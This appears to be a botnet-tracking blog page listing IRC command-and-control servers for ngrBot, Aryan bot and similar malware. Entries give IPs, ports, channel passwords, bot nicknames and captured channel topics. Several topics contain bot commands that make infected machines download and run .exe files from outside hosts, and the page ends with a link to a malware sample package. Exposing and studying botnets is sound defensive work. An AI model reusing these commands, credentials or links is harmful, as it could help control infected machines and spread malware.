The guy behind this net is a real hecker he dont stop ddosing even protected web sites Remote Host Port Number 199.15.234.7 80 207.7.85.204 6060 PASS .. NICK n{US|XPa}ejlgkgk USER ejlgkgk 0 0 :ejlgkgk JOIN #FAC ngrBot Now talking in #FAC Topic On: [ #FAC ] [ ] Topic By: [ ABOSEL7 ] (spy) !ssynRead more...
lamentin97.sytes.net(irc botnet hosted in France Paris Free Sas)
Remote Host Port Number 88.191.134.36 6667 NICK BlitZ-3wks1day6hrs59mins NICK BlitZ-1min USER sha “*” “lamentin97.sytes.net” :sha NICK TOSINT|-00 hosting infos: http://whois.domaintools.com/88.191.134.36
ccteam.ircnet.co.il(irc botnet hosted in Turkey Istanbul Global Iletisim Hizmetleri A.s)
Resolved : [ccteam.ircnet.co.il] To [91.93.117.180] Resolved : [ccteam.ircnet.co.il] To [216.210.179.67] ccteam.ircnet.co.il 216.210.179.67 Server: 216.210.179.67:6667 Server Password: Username: epulhw Nickname: cCBot|QWEG Channel: #VNC (Password: xxx) Channeltopic: :@vnc 80 1 203.x.x.x 2 0 Now talking in #VNC Topic On: [ #VNC ] [ @vnc 80 1 203.x.x.x 2 0 ] Topic By: [ asd ] hosting infos:Read more...
sean06.com(ngrBot hosted in Philippines Infravps Network Solutions)
Resolved : [sean06.com] To [63.223.79.122] Other domains used to control bots: xivo06.com gayy06.com Server: 63.223.79.122:5794 Server Password: Username: qojtcha Nickname: n{DE|XPa}qojtcha Channel: #chan (Password: ngrBot) Channeltopic: :!mdns http://64.37.52.224/tlpu/dominios.txt | !up http://www.hutaszkola.cba.pl/e107_themes/6aosifuaspelugay.exe 735E01E56A2A57BFE146282A09232041 Now talking in #chan Topic On: [ #chan ] [ !mdns http://64.37.52.224/tlpu/dominios.txt | !up http://www.hutaszkola.cba.pl/e107_themes/6aosifuaspelugay.exe 735E01E56A2A57BFE146282A09232041 ] Topic By: [ rockstar ] DownloadRead more...
tc.byinter.net(Aryan bot hosted in Sweden Deepak Mehta Fie)
tc.byinter.net 46.29.248.104 Server: 46.29.248.104:6667 Server Password: Username: 5405728 Nickname: New{DE-XP-x86}5405728 Channel: #aryan (Password: KCA) Channeltopic: :.download http://www.websells.com/test.exe 1 JOIN #KCA2 KCA #KCA2 :.dwl http://www.websells.com/ngrs.exe #KCA2 CaCa 1320706998 Nickname: n{DE|XPa}ughfqgd Channel: #KCA (Password: KCA) Channeltopic: :!j #X Now talking in #X Topic On: [ #X ] [ !mdns http://www.websells.com/av.txt !mod usbi on ] Topic By: [Read more...
ngme.beecitysearch.com(ngrBot hosted in China Zhejiang Ninbo Lanzhong Network Ltd)
Domain names used to control bots: ngme.yourwebfind.com NONE ngme.yourwebfind.com.local NONE api.wipmania.com 199.15.234.7 ngme.drwhox.com NONE ngme.drwhox.com.local NONE ngme.babypin.net 60.190.223.150 60.190.222.157 ngme.beecitysearch.com 60.190.222.157 60.190.223.150 Remote Host Port Number 199.15.234.7 80 60.190.222.157 7475 PASS 3v 60.190.223.150 7475 PASS 3v NICK New{US-XP-x86}2778075 USER 2778075 “” “2778075” :2778075 MODE New{US-XP-x86}2778075 +iMm JOIN #3v 3×3 PONG :82A39F53 Now talking in #3vRead more...
91.121.52.62(irc botnet hosted in France Ovh Systems)
Remote Host Port Number 91.121.52.62 6667 NICK [USA-8741-XP] USER 2762911 “” “lol” :2762911 PONG :84BF2326 JOIN ##!sucka suckafree Local users: Current Local Users: 320 Max: 724 Global users: Current Global Users: 2069 Max: 3831 hosting infos: http://whois.domaintools.com/91.121.52.62
208.115.198.37(irc botnet hosted in United States Douglas 123systems Solutions)
Remote Host Port Number 208.115.198.37 6668 NICK [NEW][USA]65327 USER [NEW][USA]65327 [NEW][USA]65327 [NEW][USA]65327 [NEW][USA]65327 JOIN #dream hosting infos: http://whois.domaintools.com/208.115.198.37
rtrforums.com(P2P-Worm.Win32.BlackControl hosted in Germany Frankfurt Netdirect)
Also iStealer,Blackshades Bot,Fake Facebook message hosted inside exe file: http://2ca25ee4.whackyvidz.com hosting infos: http://whois.domaintools.com/188.72.205.35
45mb malware samples
45 malware samples in this package have fun reversing Download: http://0b0b84f6.tubeviral.com